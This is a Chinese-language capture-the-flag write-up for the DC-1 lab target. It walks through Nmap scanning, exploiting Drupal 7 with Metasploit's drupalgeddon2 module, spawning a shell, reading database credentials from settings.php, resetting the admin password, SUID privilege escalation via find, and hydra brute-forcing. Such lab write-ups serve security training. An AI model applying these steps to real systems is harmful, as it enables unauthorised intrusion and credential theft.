环境准备
DC-1靶机链接:百度网盘 请输入提取码
提取码:022r
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1:使用Nmap进行扫描
Nmap -sP 192.168.1.0/24
2:直接进行详细扫描
3:访问该站点并查看robots.txt敏感文件
4:依次访问robots.txt文件中的敏感文件目录信息,发现UPGRADE.txt文件爆露出版本号
漏洞利用
1:寻找drupal 7.X版本漏洞,并进行利用
2:使用MSF搜索相关模块并进行利用
Search drupal
Use exploit/unix/webapp/drupal_drupalgeddon2
Set RHOST 192.168.0.109
Run
3:使用python反弹一个交互式shell
python -c “import pty;pty.spawn('/bin/bash')”
4:在网站根目录下发现Flag1.txt文件,查看提示寻找站点的配置文件
5:Drupal的默认配置文件为/var/www/sites/default/settings.php并查看
6:根据配置文件提示找到Flag2并发现数据库连接账号密码,根据提示需要提升权限访问敏感文件或者进行爆破账户,在此现在已有信息数据库下手
7:在此我们可以参考官方文档对drupal置换密码,
站点路径下执行:php scripts/password-hash.sh 新密码
8:登录网站,搜索发现Flag3,并根据提示需要进行SUID提权
权限提升
1:根据提示-exec,可能会是SUID提权,在此使用find命令查找suid权限的可执行二进制程序
find / -perm -4000 2>/dev/null
2:对find命令进行测试并获取root权限
3:查找敏感文件/etc/passwd发现存在Flag4用户,并使用hydra进行爆破
4:回到root用户家目录发现Flag5 , 成功拿下